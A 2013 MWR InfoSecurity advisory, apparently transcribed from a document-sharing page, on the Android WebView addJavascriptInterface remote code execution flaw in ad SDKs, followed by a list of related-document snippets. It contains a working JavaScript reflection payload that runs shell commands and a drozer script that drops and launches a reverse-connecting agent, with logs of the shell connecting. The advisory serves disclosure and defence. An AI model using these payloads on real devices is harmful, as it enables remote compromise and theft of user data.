WebView addjavascriptinterface Remote Code Execution 23/09/2013

Size: px
Start display at page:

Download "WebView addjavascriptinterface Remote Code Execution 23/09/2013"

Transcription

1 MWR InfoSecurity Advisory WebView addjavascriptinterface Remote Code Execution 23/09/2013 Package Name Date Affected Versions Google Android Webkit WebView 23/09/2013 All Android applications built with or against API versions less than 17 Author Severity Local/Remote Vulnerability Class Vendor Dave Hartley High Remote Remote Command Execution Google Description Many free mobile applications use a WebView to load HTML content as an in process web browser to facilitate advertisement loading from remote advertiser networks. These advertisements are loaded over a clear text channel (HTTP) and are susceptible to Man in the Middle (MitM) attacks. An attacker able to MitM the communications with the advertising network can inject arbitrary Java Script into the WebView. If the WebView provides access to native functionality via JavaScript bridge utilising the addjavascriptinterface method, then the WebView Java Script bridge can then be abused to execute arbitrary Java code. This is achieved by using reflection to acquire a reference to a runtime object via the interface implemented. Impact The addjavascriptinterface method can be abused via reflection to execute commands remotely in the context of the running application. Cause The addjavascriptinterface method exposes a supplied Java object from within a WebView to JavaScript. For applications compiled or linked against and API level less than 17; all public methods (including the inherited ones) can be accessed. Through the use of reflection it is also possible to invoke any other unregistered Java class. Interim Workaround Android users should remove any and all applications that embed advertisements. Alternatively ensure that you do not connect to untrusted networks while using applications with embedded advertisements. Solution This issue has been resolved in applications developed for Android 4.2 (API level 17) and above. Starting from Android 4.2 (API level 17) and above, only methods explicitly marked with annotation are available to JavaScript code within the WebView. The annotation must be added to any method that is intended to be exposed via the native bridge (the method must also be public). An example is presented below: mwrinfosecurity.com MWR InfoSecurity 1 of 6

2 @JavascriptInterface public void method() { dostuff(); To resolve the issue the ad networks would need to re- engineer their SDK's and to build them for API 17 or above. All of the app developers using the old and vulnerable SDK's will need to link against the new SDK's and redistribute their applications. Android users would need to upgrade their applications - and possibly devices, to use the new non- vulnerable applications. It would also be advisable for the ad networks to only serve content over an encrypted channel (SSL/TLS). We expect this issue to be around for some time. Technical Description Recently we have been researching vulnerabilities within cross platform mobile application development frameworks. Whilst performing this research we have identified a number of issues. This advisory will detail one of the more serious of the issues, which affects all current Android platforms and devices. The issue allows an attacker to execute arbitrary code on Android devices. The vulnerability is exploited by injecting JavaScript into a WebView (http://developer.android.com/reference/android/webkit/webview.html). We have released output from related research previously; see the previous post "Adventures With Android WebViews" for background information here with- android- webviews. Lately we have been analysing mobile advertising networks and in particular the Software Development Kit (SDK) that the networks make available to application developers for the purpose of monetising their applications. During this research we have found that a lot of applications expose mobile device users to the threat of compromise. We have found a number of exploitable (cross platform) vulnerabilities and expect to find more as research continues. We are in the early stages of the research and we will be conducting further research in this area; however we have decided to release this advisory now as to help Android users take appropriate actions to protect themselves. Many advertising networks make an SDK available to application developers to 'ease' integration. The SDK contains header files and a static library. Header files contain function declarations that are imported into a project so that the functions can be called. The library file contains the actual executable code that does the work. This is linked in by the linker to provide the actual functionality (the definitions rather than just the declarations). The advertising networks require the application to display content within a WebKit WebView. WebKit is an open source web browser engine that powers browsers such as Google Chrome, Apple Safari, the default ios and Android browsers etc. WebView is the core view class in the WebKit framework. Many free apps use a WebView to load HTML content as an in- process web browser and the advertising network SDK uses the browser instance to facilitate advertisement loading from remote advertiser networks. These advertisements are loaded over a clear text channel (HTTP) and are susceptible to Man in the Middle (MitM) attacks. An attacker able to MitM the communications with the advertising network can inject arbitrary JavaScript into the WebView. Advertising networks gather metrics so that they can tailor campaigns and target specific 'audiences'. Advertisers pay a lot of money for accurate metrics and/or successful delivery of targeted advertisements. Advertising networks also want to leverage the mobile device platform to deliver 'rich media' advertisements. To achieve their goals, access to the platform/devices native capabilities is often required. This is realised by implementing a "native bridge". It is possible to call 'native' code from a rendered WebView by using JavaScript. This is achieved on the Android platform in two different ways, the first is to use the public methods 'shouldoverrideurlloading' - see the Android developer site for details on this method here MWR InfoSecurity 2 of 6

3 d.webkit.webview,%20java.lang.string). An example implementation is public boolean shouldoverrideurlloading(webview view, String url) { if (url.substring(0,6).equalsignorecase("yourscheme:")) { // parse the URL object and execute functions A call into Java can then be initiated from Java Script by passing parameters within the URL: window.location = yourscheme://method?parameter=value The second method available for the Android platform is to use the android.webkit.javascriptinterface interface - see the Android developer site for details on the interface - An example implementation is below: public class WebViewGUI extends Activity { WebView mwebview; public void oncreate(bundle savedinstancestate) { super.oncreate(savedinstancestate); mwebview=new WebView(this); mwebview.getsettings().setjavascriptenabled(true); mwebview.addjavascriptinterface(new JavaScriptInterface(), "jsinterface"); mwebview.loadurl("file:///android_asset/www/index.html"); setcontentview(mwebview); final class JavaScriptInterface { JavaScriptInterface () { public String getsomestring() { return "string"; A call into Java can be initiated from Java Script as such: var String = window.jsinterface.getsomestring(); The WebView JavaScript bridge can be abused to execute arbitrary Java code, by using reflection to acquire a reference to a runtime object via the interface implemented in the Java code above. Note: The JavaScriptInterface can be named anything, "jsinterface" has been chosen for illustration purposes only. The issue has been disclosed publically in an article authored by 'Neil' titled "Abusing WebView JavaScript Bridges" (http:// /blog/?p=314) on December the 21st, The issue is alluded to in a paper titled "Static Analysis of Dalvik Bytecode and Reflection in Android" authored by Erik Ramsgaard Wognsen and Henrik Søndberg Karlsen, the paper can be found here However we found no other references to it or discussions with regards to active exploitation online, prior to presenting this issue and related research on the 13 th September at the 44CON conference. On the 16th September the following was posted online, 2/analyzing- android- webview- exploit detailing how the issue can be used to send SMS. MWR InfoSecurity 3 of 6

4 The following JavaScript, if injected into a WebView that implements a native bridge using the android.webkit.javascriptinterface interface, will result in the execution of operating system commands (via java.lang.runtime) - see the Android developer site for details here <script> function execute(cmd){return window.jsinterface.getclass().forname('java.lang.runtime').getmethod('getrunt ime',null).invoke(null,null).exec(cmd); execute(['/system/bin/sh','-c','echo \"mwr\" > /mnt/sdcard/mwr.txt']); </script> We can go even further and use this vector to drop in a 'drozer' payload for a much more feature rich exploitation experience; drozer is an Android security assessment framework (think Metasploit for Android) and can be found here Weasel is a binary that aids in the loading and running of a drozer agent once code execution has been gained on an Android device (think meterpreter for Android). To do this we can use drozer to generate a 'weasel' payload. $ drozer payload list shell.reverse_tcp.armeabi Establish a reverse TCP Shell (ARMEABI) weasel.reverse_tcp.armeabi weasel through a reverse TCP Shell (ARMEABI) weasel.shell.armeabi Deploy weasel, through a set of Shell commands (ARMEABI) $ drozer payload build weasel.shell.armeabi grep echo awk -F \" {'gsub("\\\\","\\\\"); print "execute([\x27/system/bin/sh\x27,\x27-c\x27,\x27 echo -e \\\""$2"\\\" > \x27+path]);"' Which will give you a one liner to embed into the JavaScript payload: execute(['/system/bin/sh','-c','echo -e " " > '+path]); The payload we are going to inject (with the binary stripped for readability) is below: $ cat drozer.js var host = ' '; var port = '31415'; var path = '/data/data/com.vuln.app/files/weasel'; function execute(cmd){return window.interface.getclass().forname('java.lang.runtime').getmethod('getruntim e',null).invoke(null,null).exec(cmd); execute(['/system/bin/rm',path]); execute(['/system/bin/sh','-c','echo -e " " > '+path]); execute(['/system/bin/chmod','770',path]); execute([path,host,port]); If the payload is injected into the WebView as above it will write and execute the weasel payload. The command below starts the drozer server and as can be seen, the payload has executed and connected back to the drozer server: $ drozer server start Starting drozer Server, listening on : :02:08,238 - drozer.server.protocols.http - INFO - GET /agent.jar :02:08,256 - drozer.server.protocols.http - INFO - GET /agent.apk MWR InfoSecurity 4 of 6

5 :02:08,808 - drozer.server.protocols.drozerp.droidhg - INFO - accepted connection from 47k5n8v3nbdpg :02:08,834 - drozer.server.protocols.shell - INFO - accepted shell from :63804 The command below will list the connected remote devices: $ drozer console devices List of Bound Devices Device ID Manufacturer Model Software 47k5n8v3nbdpg unknown unknown unknown The command below can then be used to connect to our listening console: $ drozer console connect 47k5n8v3nbdpg....:...o...r....a nd ro..idsnemesisand..pr.otectorandroidsneme..,sisandprotectorandroids+...nemesisandprotectorandroidsn:..emesisandprotectorandroidsnemes....isandp,..,rotectorandro,..,idsnem..isisandp..rotectorandroid..snemisis.,andprotectorandroidsnemisisandprotec..torandroidsnemesisandprotectorandroid..snemisisandprotectorandroidsnemesisan:.dprotectorandroidsnemesisandprotector. drozer Console (v2.3.0) dz> At this point, the attacker is able to perform a number of attacks against the device using drozer. The lowest impact attack would be downloading contents of the SD card and the exploited application's data directory. However, depending on the device that was exploited this could extend to obtaining root privileges, retrieving other sensitive user data from the device or causing the user monetary loss. We have analysed a large number of advertising network SDK's and found that a lot of these implement bridges that are vulnerable to exploitation. Some advertising network SDK's obtained from the advertising networks directly were found to not be vulnerable (in their most recent versions). However a lot of applications on the "Google Play Store" were found to be using old versions of the SDK's, which are vulnerable. Note: If the linked SDK has been built for an API lower than 17, the vulnerability exists - even if the application using the SDK has been built for API 17 or above. This issue is exploitable on all devices and versions of Android. The command below can be used to identify the presence of the JavascriptInterface (after decompiling the app you are inspecting): $ grep -r -n -i --include=*.java addjavascriptinterface * The command below can be used to indicate if the code has been built for API 17 (or above) and includes the annotation: MWR InfoSecurity 5 of 6

6 $ grep -r -i --include=*.java * Note: Packages were decompiled using jd- gui in order to ensure annotations were included. On the 30th of July 2013, MWR downloaded the top 100 Android applications in the "Google Play Store" and analysed the applications. Out of the apps that were profiled, there were a number of apps which did not use ads as a monetisation strategy, due to being popular subscription services (like Netflix) or being free services funded in some other way (such as ebay). This means that (as of 30/07/2013) 21/100 of the top 100 free apps are ad- free. Of the remaining 79 applications it was discovered that many used multiple advertising libraries or frameworks are in use. The results are presented below: Number of ad networks identified Admob (Google) InMobi MdotM Admarvel Flurry Tapjoy Millenial Media Medialets Greystipe adwhirl freewheel Number of ad frameworks identified: MoPub Burstly Mobclix Mocean These applications were examined to determine how many are vulnerable to this issue. The APK's for the applications were downloaded and decompiled. The source was searched for the use of "addjavascriptinterface" before being searched for the presence of the annotation. Any package or linked ad SDK that contained the annotation was dismissed. The findings indicated that 62 of the 100 apps are 'potentially' vulnerable. Not all of the interfaces are implemented within ad networks and not all of the interfaces are present in WebViews that load content remotely over a clear text channel. We didn't investigate each and every package. A script was then crafted to automatically download Android applications, decompile them and identify if an ad network was in use, and if so determine if it is vulnerable. Out of the 1,000 top applications 570 were found to be vulnerable. According to AppBrain (http://www.appbrain.com/stats/free- and- paid- android- applications) on the 30/07/2013 there were 655,325 free apps and 153,813 paid apps; 809,138 apps in total. AppBrain is a website for discovering Android apps. AppBrain also includes stats on the number of apps that integrate ad network SDK's (http://www.appbrain.com/stats/libraries/ad) out of all of the apps in the "Google Play Store". This clearly illustrates just how many applications are potential targets for attack. The page lists 77 ad networks/ad frameworks. It is unfeasible for us to analyse each and every SDK to determine its exploitability and as previously stated; even if the latest SDK available is not vulnerable, there may well be apps in the market place that haven't upgraded their SDK from a vulnerable version and are therefore vulnerable. MWR InfoSecurity 6 of 6

MWR InfoSecurity Security Advisory. pfsense DHCP Script Injection Vulnerability. 25 th July 2008. Contents

MWR InfoSecurity Security Advisory. pfsense DHCP Script Injection Vulnerability. 25 th July 2008. Contents Contents MWR InfoSecurity Security Advisory pfsense DHCP Script Injection Vulnerability 25 th July 2008 2008-07-25 Page 1 of 10 Contents Contents 1 Detailed Vulnerability Description... 5 1.1 Technical

More information

MWR InfoSecurity Security Advisory. BT Home Hub SSID Script Injection Vulnerability. 10 th May 2010. Contents

MWR InfoSecurity Security Advisory. BT Home Hub SSID Script Injection Vulnerability. 10 th May 2010. Contents Contents MWR InfoSecurity Security Advisory BT Home Hub SSID Script Injection Vulnerability 10 th May 2010 2010-05-10 Page 1 of 8 Contents Contents 1 Detailed Vulnerability Description... 5 1.1 Technical

More information

Practical Exploitation Using A Malicious Service Set Identifier (SSID)

Practical Exploitation Using A Malicious Service Set Identifier (SSID) Practical Exploitation Using A Malicious Service Set Identifier (SSID) Deral Heiland Senior Security Engineer CDW Advanced Technology Services Mike Belton Technical Lead CDW Advanced Technology Services

More information

Attacks on WebView in the Android System

Attacks on WebView in the Android System Attacks on WebView in the Android System Tongbo Luo, Hao Hao, Wenliang Du, Yifei Wang, and Heng Yin Dept. of Electrical Engineering & Computer Science, Syracuse University Syracuse, New York, USA ABSTRACT

More information

UNRESTRICTED EXTERNAL

UNRESTRICTED EXTERNAL drozer Users Guide mwrinfosecurity.com MWR InfoSecurity UNRESTRICTED EXTERNAL 1 Contents page Change Synopsis... 3 1. Introduction... 4 1.1 What is drozer?... 4 1.2 Conventions... 4 2. Getting Started...

More information

MWR InfoSecurity Security Advisory. Symantec s Altiris Deployment Solution File Transfer Race Condition. 7 th January 2010

MWR InfoSecurity Security Advisory. Symantec s Altiris Deployment Solution File Transfer Race Condition. 7 th January 2010 al al MWR InfoSecurity Security Advisory Symantec s Altiris Deployment Solution File Transfer Race Condition 7 th January 2010 20010-01-07 Page 1 of 8 Contents Contents 1 Detailed Vulnerability Description...4

More information

The Android Developers Guide to 3 rd -Party SDK Assessment and Security

The Android Developers Guide to 3 rd -Party SDK Assessment and Security SESSION ID: MBS-F02 The Android Developers Guide to 3 rd -Party SDK Assessment and Security Yang Yang( 杨 德 志 ) Mobile Security Researcher and Developer, Trend Micro Advantages of 3 rd -Party SDKs Speed

More information

BlackBerry Enterprise Service 10. Secure Work Space for ios and Android Version: 10.1.1. Security Note

BlackBerry Enterprise Service 10. Secure Work Space for ios and Android Version: 10.1.1. Security Note BlackBerry Enterprise Service 10 Secure Work Space for ios and Android Version: 10.1.1 Security Note Published: 2013-06-21 SWD-20130621110651069 Contents 1 About this guide...4 2 What is BlackBerry Enterprise

More information

Adobe Flash Player and Adobe AIR security

Adobe Flash Player and Adobe AIR security Adobe Flash Player and Adobe AIR security Both Adobe Flash Platform runtimes Flash Player and AIR include built-in security and privacy features to provide strong protection for your data and privacy,

More information

Lecture 1 Introduction to Android

Lecture 1 Introduction to Android These slides are by Dr. Jaerock Kwon at. The original URL is http://kettering.jrkwon.com/sites/default/files/2011-2/ce-491/lecture/alecture-01.pdf so please use that instead of pointing to this local copy

More information

APPLICATION SECURITY: FROM WEB TO MOBILE. DIFFERENT VECTORS AND NEW ATTACK

APPLICATION SECURITY: FROM WEB TO MOBILE. DIFFERENT VECTORS AND NEW ATTACK APPLICATION SECURITY: FROM WEB TO MOBILE. DIFFERENT VECTORS AND NEW ATTACK John T Lounsbury Vice President Professional Services, Asia Pacific INTEGRALIS Session ID: MBS-W01 Session Classification: Advanced

More information

Cross-site site Scripting Attacks on Android WebView

Cross-site site Scripting Attacks on Android WebView IJCSN International Journal of Computer Science and Network, Vol 2, Issue 2, April 2013 1 Cross-site site Scripting Attacks on Android WebView 1 Bhavani A B 1 Hyderabad, Andhra Pradesh-500050, India Abstract

More information

Tushar Dalvi Sr. Security Engineer at LinkedIn Penetration Tester. Responsible for securing a large suite mobile apps

Tushar Dalvi Sr. Security Engineer at LinkedIn Penetration Tester. Responsible for securing a large suite mobile apps Tony Trummer Staff Engineer, Information Security at LinkedIn Penetration tester and mobile security enthusiast #3 in Android Security Acknowledgements Tushar Dalvi Sr. Security Engineer at LinkedIn Penetration

More information

Securing ios Applications. Dr. Bruce Sams, OPTIMAbit GmbH

Securing ios Applications. Dr. Bruce Sams, OPTIMAbit GmbH Securing ios Applications Dr. Bruce Sams, OPTIMAbit GmbH About Me President of OPTIMAbit GmbH Responsible for > 200 Pentests per Year Ca 50 ios Pentests and code reviews in the last two years. Overview

More information

OUT OF POCKET: A Comprehensive Mobile Threat Assessment of 7 Million ios and Android Apps FEBRUARY 2015 SECURITY REIMAGINED

OUT OF POCKET: A Comprehensive Mobile Threat Assessment of 7 Million ios and Android Apps FEBRUARY 2015 SECURITY REIMAGINED S P E C I A L R E P O R T OUT OF POCKET: A Comprehensive Mobile Threat Assessment of 7 Million ios and Android Apps FEBRUARY 2015 SECURITY REIMAGINED CONTENTS FEBRUARY 2015 Executive Summary 3 Introduction

More information

Smartphone Pentest Framework v0.1. User Guide

Smartphone Pentest Framework v0.1. User Guide Smartphone Pentest Framework v0.1 User Guide 1 Introduction: The Smartphone Pentest Framework (SPF) is an open source tool designed to allow users to assess the security posture of the smartphones deployed

More information

The Lifetime of Android API vulnerabilities: case study on the JavaScript-to-Java interface

The Lifetime of Android API vulnerabilities: case study on the JavaScript-to-Java interface 1 The Lifetime of Android API vulnerabilities: case study on the JavaScript-to-Java interface Daniel R. Thomas 1, Alastair R. Beresford 1, Thomas Coudray 2, Tom Sutcliffe 2, and Adrian Taylor 2 1 Computer

More information

Legal notices. Legal notices. For legal notices, see http://help.adobe.com/en_us/legalnotices/index.html.

Legal notices. Legal notices. For legal notices, see http://help.adobe.com/en_us/legalnotices/index.html. ADOBE AIR Security Legal notices Legal notices For legal notices, see http://help.adobe.com/en_us/legalnotices/index.html. iii Contents Installing and updating desktop applications...........................................................................

More information

the cross platform mobile apps dream Click to edit Master title style Click to edit Master text styles Third level Fourth level» Fifth level

the cross platform mobile apps dream Click to edit Master title style Click to edit Master text styles Third level Fourth level» Fifth level Click to edit Master title style Click to edit Master text styles The Second nightmare level behind Third level the cross platform Fourth level» Fifth level mobile apps dream Marco Grassi @marcograss MGrassi@nowsecure.com

More information

ANDROID APPS DEVELOPMENT FOR MOBILE AND TABLET DEVICE (LEVEL I)

ANDROID APPS DEVELOPMENT FOR MOBILE AND TABLET DEVICE (LEVEL I) ANDROID APPS DEVELOPMENT FOR MOBILE AND TABLET DEVICE (LEVEL I) Who am I? Lo Chi Wing, Peter Lecture 1: Introduction to Android Development Email: Peter@Peter-Lo.com Facebook: http://www.facebook.com/peterlo111

More information

HP AppPulse Mobile. Adding HP AppPulse Mobile to Your Android App

HP AppPulse Mobile. Adding HP AppPulse Mobile to Your Android App HP AppPulse Mobile Adding HP AppPulse Mobile to Your Android App Document Release Date: April 2015 How to Add HP AppPulse Mobile to Your Android App How to Add HP AppPulse Mobile to Your Android App For

More information

KonyOne Server Prerequisites _ MS SQL Server

KonyOne Server Prerequisites _ MS SQL Server KonyOne Server Prerequisites _ MS SQL Server KonyOne Platform Release 5.0 Copyright 2012-2013 Kony Solutions, Inc. All Rights Reserved. Page 1 of 13 Copyright 2012-2013 by Kony Solutions, Inc. All rights

More information

Mercury User Guide v1.1

Mercury User Guide v1.1 Mercury User Guide v1.1 Tyrone Erasmus 2012-09-03 Index Index 1. Introduction... 3 2. Getting started... 4 2.1. Recommended requirements... 4 2.2. Download locations... 4 2.3. Setting it up... 4 2.3.1.

More information

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder. CMSC 355 Lab 3 : Penetration Testing Tools Due: September 31, 2010 In the previous lab, we used some basic system administration tools to figure out which programs where running on a system and which files

More information

ITP 140 Mobile Technologies. Mobile Topics

ITP 140 Mobile Technologies. Mobile Topics ITP 140 Mobile Technologies Mobile Topics Topics Analytics APIs RESTful Facebook Twitter Google Cloud Web Hosting 2 Reach We need users! The number of users who try our apps Retention The number of users

More information

Android Development. Marc Mc Loughlin

Android Development. Marc Mc Loughlin Android Development Marc Mc Loughlin Android Development Android Developer Website:h:p://developer.android.com/ Dev Guide Reference Resources Video / Blog SeCng up the SDK h:p://developer.android.com/sdk/

More information

HTML5 / NATIVE / HYBRID

HTML5 / NATIVE / HYBRID HTML5 / NATIVE / HYBRID Ryan Paul Developer Evangelist @ Xamarin NATIVE VERSUS HTML5? REFRAMING THE DEBATE It s not a battle to the death. It s a choice: what solution will work best for your application?

More information

Workday Mobile Security FAQ

Workday Mobile Security FAQ Workday Mobile Security FAQ Workday Mobile Security FAQ Contents The Workday Approach 2 Authentication 3 Session 3 Mobile Device Management (MDM) 3 Workday Applications 4 Web 4 Transport Security 5 Privacy

More information

Penetration Testing for iphone Applications Part 1

Penetration Testing for iphone Applications Part 1 Penetration Testing for iphone Applications Part 1 This article focuses specifically on the techniques and tools that will help security professionals understand penetration testing methods for iphone

More information

Hello World. by Elliot Khazon

Hello World. by Elliot Khazon Hello World by Elliot Khazon Prerequisites JAVA SDK 1.5 or 1.6 Windows XP (32-bit) or Vista (32- or 64-bit) 1 + more Gig of memory 1.7 Ghz+ CPU Tools Eclipse IDE 3.4 or 3.5 SDK starter package Installation

More information

Defending Behind The Device Mobile Application Risks

Defending Behind The Device Mobile Application Risks Defending Behind The Device Mobile Application Risks Tyler Shields Product Manager and Strategist Veracode, Inc Session ID: MBS-301 Session Classification: Advanced Agenda The What The Problem Mobile Ecosystem

More information

Introduction to Android

Introduction to Android Introduction to Android 26 October 2015 Lecture 1 26 October 2015 SE 435: Development in the Android Environment 1 Topics for Today What is Android? Terminology and Technical Terms Ownership, Distribution,

More information

AppConnect FAQ for MobileIron Technology Partners! AppConnect Overview

AppConnect FAQ for MobileIron Technology Partners! AppConnect Overview AppConnect FAQ for MobileIron Technology Partners! AppConnect Overview What is AppConnect? AppConnect is a MobileIron product that secures and protects enterprise mobile apps. It manages the complete lifecycle

More information

Citrix Worx App SDK Overview

Citrix Worx App SDK Overview Citrix Worx App SDK Overview Table of Contents Introduction... 3 About the App Catalog Deployment Model... 3 About the Citrix MDX Toolkit... 4 The Worx App SDK... 5 The Unmanaged and Managed Modes of Worx

More information

Building Secure Mobile Applications Using MaaS360 SDK and IBM Worklight

Building Secure Mobile Applications Using MaaS360 SDK and IBM Worklight Building Secure Mobile Applications Using MaaS360 SDK and IBM Worklight Karthik Ramgopal/Paras Segal kramgopal@fiberlink.com psegal@fiberlink.com www.maas360.com Why Mobile Applications are a Must? Rising

More information

Security Guide. BlackBerry Enterprise Service 12. for ios, Android, and Windows Phone. Version 12.0

Security Guide. BlackBerry Enterprise Service 12. for ios, Android, and Windows Phone. Version 12.0 Security Guide BlackBerry Enterprise Service 12 for ios, Android, and Windows Phone Version 12.0 Published: 2015-02-06 SWD-20150206130210406 Contents About this guide... 6 What is BES12?... 7 Key features

More information

Recent Advances in Web Application Security

Recent Advances in Web Application Security Recent Advances in Web Application Security Author: Neelay S Shah Principal Security Consultant Foundstone Professional Services Table of Contents Introduction 3 Content Security Policy 3 Best Practices

More information

Portability Study of Android and ios

Portability Study of Android and ios Portability Study of Android and ios Brandon Stewart Problem Report submitted to the Benjamin M. Statler College of Engineering and Mineral Resources at West Virginia University in partial fulfillment

More information

AppUse - Android Pentest Platform Unified

AppUse - Android Pentest Platform Unified AppUse - Android Pentest Platform Unified Standalone Environment AppUse is designed to be a weaponized environment for Android application penetration testing. It is a unique, free, and rich platform aimed

More information

A Large-Scale Study of Mobile Web App Security

A Large-Scale Study of Mobile Web App Security A Large-Scale Study of Mobile Web App Security Patrick Mutchler, Adam Doupé, John Mitchell, Chris Kruegel and Giovanni Vigna Stanford University {pcm2d, mitchell}@stanford.edu Arizona State University

More information

Penetration Testing with Kali Linux

Penetration Testing with Kali Linux Penetration Testing with Kali Linux PWK Copyright 2014 Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security, 2014 No part of this publication, in whole or

More information

Android Development. http://developer.android.com/develop/ 吳 俊 興 國 立 高 雄 大 學 資 訊 工 程 學 系

Android Development. http://developer.android.com/develop/ 吳 俊 興 國 立 高 雄 大 學 資 訊 工 程 學 系 Android Development http://developer.android.com/develop/ 吳 俊 興 國 立 高 雄 大 學 資 訊 工 程 學 系 Android 3D 1. Design 2. Develop Training API Guides Reference 3. Distribute 2 Development Training Get Started Building

More information

Develop a Native App (ios and Android) for a Drupal Website without Learning Objective-C or Java. Drupaldelphia 2014 By Joe Roberts

Develop a Native App (ios and Android) for a Drupal Website without Learning Objective-C or Java. Drupaldelphia 2014 By Joe Roberts Develop a Native App (ios and Android) for a Drupal Website without Learning Objective-C or Java Drupaldelphia 2014 By Joe Roberts Agenda What is DrupalGap and PhoneGap? How to setup your Drupal website

More information

Mocean Android SDK Developer Guide

Mocean Android SDK Developer Guide Mocean Android SDK Developer Guide For Android SDK Version 3.2 136 Baxter St, New York, NY 10013 Page 1 Table of Contents Table of Contents... 2 Overview... 3 Section 1 Setup... 3 What changed in 3.2:...

More information

BASIC COMPONENTS. There are 3 basic components in every Apache Cordova project:

BASIC COMPONENTS. There are 3 basic components in every Apache Cordova project: Apache Cordova is a open-source mobile development framework. It allows you to use standard web technologies such as HTML5, CSS3 and JavaScript for cross-platform development, avoiding each mobile platform

More information

Self Testing with MoPub SDK

Self Testing with MoPub SDK Self Testing with MoPub SDK What: SimpleAds Demo is an iphone and Android application that displays the three basic type of ads offered through MoPub Banner (320x50), MRect (300x200), and Interstitial

More information

Shellshock. Oz Elisyan & Maxim Zavodchik

Shellshock. Oz Elisyan & Maxim Zavodchik Shellshock By Oz Elisyan & Maxim Zavodchik INTRODUCTION Once a high profile vulnerability is released to the public, there will be a lot of people who will use the opportunity to take advantage on vulnerable

More information

ABSTRACT' INTRODUCTION' COMMON'SECURITY'MISTAKES'' Reverse Engineering ios Applications

ABSTRACT' INTRODUCTION' COMMON'SECURITY'MISTAKES'' Reverse Engineering ios Applications Reverse Engineering ios Applications Drew Branch, Independent Security Evaluators, Associate Security Analyst ABSTRACT' Mobile applications are a part of nearly everyone s life, and most use multiple mobile

More information

AGENDA. Background. The Attack Surface. Case Studies. Binary Protections. Bypasses. Conclusions

AGENDA. Background. The Attack Surface. Case Studies. Binary Protections. Bypasses. Conclusions MOBILE APPLICATIONS AGENDA Background The Attack Surface Case Studies Binary Protections Bypasses Conclusions BACKGROUND Mobile apps for everything == lots of interesting data Banking financial Social

More information

Troubleshooting BlackBerry Enterprise Service 10 version 10.1.1 726-08745-123. Instructor Manual

Troubleshooting BlackBerry Enterprise Service 10 version 10.1.1 726-08745-123. Instructor Manual Troubleshooting BlackBerry Enterprise Service 10 version 10.1.1 726-08745-123 Instructor Manual Published: 2013-07-02 SWD-20130702091645092 Contents Advance preparation...7 Required materials...7 Topics

More information

Universal Mobile Ads is a plugin for Unreal Engine 4 that enables the MoPub ad mediation system for ios & Android.

Universal Mobile Ads is a plugin for Unreal Engine 4 that enables the MoPub ad mediation system for ios & Android. Contents 1. License... 3 2. Introduction... 3 3. Supported Ad Formats... 5 a. Banner... 5 b. Interstitial... 5 c. Rewarded Video... 6 4. Supported Ad Networks... 7 5. Getting started... 8 6. Configure

More information

Pentesting Android Apps. Sneha Rajguru (@Sneharajguru)

Pentesting Android Apps. Sneha Rajguru (@Sneharajguru) Pentesting Android Apps Sneha Rajguru (@Sneharajguru) About Me Penetration Tester Web, Mobile and Infrastructure applications, Secure coding ( part time do secure code analysis), CTF challenge writer (at

More information

ECWM511 MOBILE APPLICATION DEVELOPMENT Lecture 1: Introduction to Android

ECWM511 MOBILE APPLICATION DEVELOPMENT Lecture 1: Introduction to Android Why Android? ECWM511 MOBILE APPLICATION DEVELOPMENT Lecture 1: Introduction to Android Dr Dimitris C. Dracopoulos A truly open, free development platform based on Linux and open source A component-based

More information

Programming IoT Gateways With macchina.io

Programming IoT Gateways With macchina.io Programming IoT Gateways With macchina.io Günter Obiltschnig Applied Informatics Software Engineering GmbH Maria Elend 143 9182 Maria Elend Austria guenter.obiltschnig@appinf.com This article shows how

More information

Mike Zusman 3/7/2011. OWASP Goes Mobile SANS AppSec Summit 2011

Mike Zusman 3/7/2011. OWASP Goes Mobile SANS AppSec Summit 2011 Mike Zusman 3/7/2011 OWASP Goes Mobile SANS AppSec Summit 2011 Agenda Introductions OWASP Summit Recap OWASP Mobile Top 10 v0.1 (DRAFT) 2 Who Are We Other than carbon-based multi-cellular life forms 3

More information

Cross-Site Scripting

Cross-Site Scripting Cross-Site Scripting (XSS) Computer and Network Security Seminar Fabrice Bodmer (fabrice.bodmer@unifr.ch) UNIFR - Winter Semester 2006-2007 XSS: Table of contents What is Cross-Site Scripting (XSS)? Some

More information

Analysis of advanced issues in mobile security in android operating system

Analysis of advanced issues in mobile security in android operating system Available online atwww.scholarsresearchlibrary.com Archives of Applied Science Research, 2015, 7 (2):34-38 (http://scholarsresearchlibrary.com/archive.html) ISSN 0975-508X CODEN (USA) AASRC9 Analysis of

More information

Building native mobile apps for Digital Factory

Building native mobile apps for Digital Factory DIGITAL FACTORY 7.0 Building native mobile apps for Digital Factory Rooted in Open Source CMS, Jahia s Digital Industrialization paradigm is about streamlining Enterprise digital projects across channels

More information

http://docs.trendmicro.com

http://docs.trendmicro.com Trend Micro Incorporated reserves the right to make changes to this document and to the products described herein without notice. Before installing and using the product, please review the readme files,

More information

BYPASSING THE ios GATEKEEPER

BYPASSING THE ios GATEKEEPER BYPASSING THE ios GATEKEEPER AVI BASHAN Technology Leader Check Point Software Technologies, Ltd. OHAD BOBROV Director, Mobile Threat Prevention Check Point Software Technologies, Ltd. EXECUTIVE SUMMARY

More information

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework Detecting and Exploiting XSS with Xenotix XSS Exploit Framework ajin25@gmail.com keralacyberforce.in Introduction Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s.

More information

Index. AdWords, 182 AJAX Cart, 129 Attribution, 174

Index. AdWords, 182 AJAX Cart, 129 Attribution, 174 Index A AdWords, 182 AJAX Cart, 129 Attribution, 174 B BigQuery, Big Data Analysis create reports, 238 GA-BigQuery integration, 238 GA data, 241 hierarchy structure, 238 query language (see also Data selection,

More information

Building a Mobile App Security Risk Management Program. Copyright 2012, Security Risk Advisors, Inc. All Rights Reserved

Building a Mobile App Security Risk Management Program. Copyright 2012, Security Risk Advisors, Inc. All Rights Reserved Building a Mobile App Security Risk Management Program Your Presenters Who Are We? Chris Salerno, Consultant, Security Risk Advisors Lead consultant for mobile, network, web application penetration testing

More information

Top Ten Web Attacks. Saumil Shah Net-Square. BlackHat Asia 2002, Singapore

Top Ten Web Attacks. Saumil Shah Net-Square. BlackHat Asia 2002, Singapore Top Ten Web Attacks Saumil Shah Net-Square BlackHat Asia 2002, Singapore TodayÕs battleground Ð the Web Web sites and web applications rapidly growing. Complex business applications are now delivered over

More information

